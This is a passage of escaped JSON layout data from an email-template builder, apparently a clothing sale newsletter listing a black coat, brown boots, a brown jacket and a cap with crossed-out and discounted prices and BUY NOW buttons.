style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>BLACK COAT<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"7mbKRKs8cJ\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">$3099<\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">$2599<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Ywz0lJEblu\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">BUY NOW<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":115,\\\"calculatedHeight\\\":46}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"ZnXDn5Opvc\\\",\\\"contents\\\":[{\\\"id\\\":\\\"P5OtO300Rz\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603386599703-453082\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YevU_4k3GY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>SHOES&nbsp;<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"52iCw45boK\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>BROWN BOOTS<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xlktZNhNOB\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">$790<\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">$650<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"UAWeiywcki\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">BUY NOW<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":115,\\\"calculatedHeight\\\":46}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"h2d6KUlkns\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"f6A4my_Pms\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VdDHPWt0iP\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"12px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"jGn9BP12s0\\\",\\\"cells\\\":[48.5,51.5],\\\"columns\\\":[{\\\"id\\\":\\\"UWLcIjkmlm\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_hfevwsrct\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387056042-675512\\\",\\\"width\\\":640,\\\"height\\\":454,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"TiFvAOhXVM\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_24\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>OUTERWEAR&nbsp;<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"NIKaJPv8eW\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_25\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>BROWN&nbsp; JACKET<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BbTWnFbEyI\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">$2099<\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">$1299<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3B_Kr1Vcqn\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">BUY NOW<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":115,\\\"calculatedHeight\\\":46}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"qS6NDWp4vQ\\\",\\\"contents\\\":[{\\\"id\\\":\\\"sr6DIxnHNr\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387097160-161951\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"88MMdgwR8d\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HATS<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"1U8NzFCJVz\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_19\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>A CAP<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"DgBI9D8nGM\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">$220<\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">$120<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3Ey4UeLIi8\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_6\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">BUY NOW<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":115,\\\"calculatedHeight\\\":46}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"hE75zgOYYF\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"pRAkwR5iCb\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AG1wZls3cI\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"h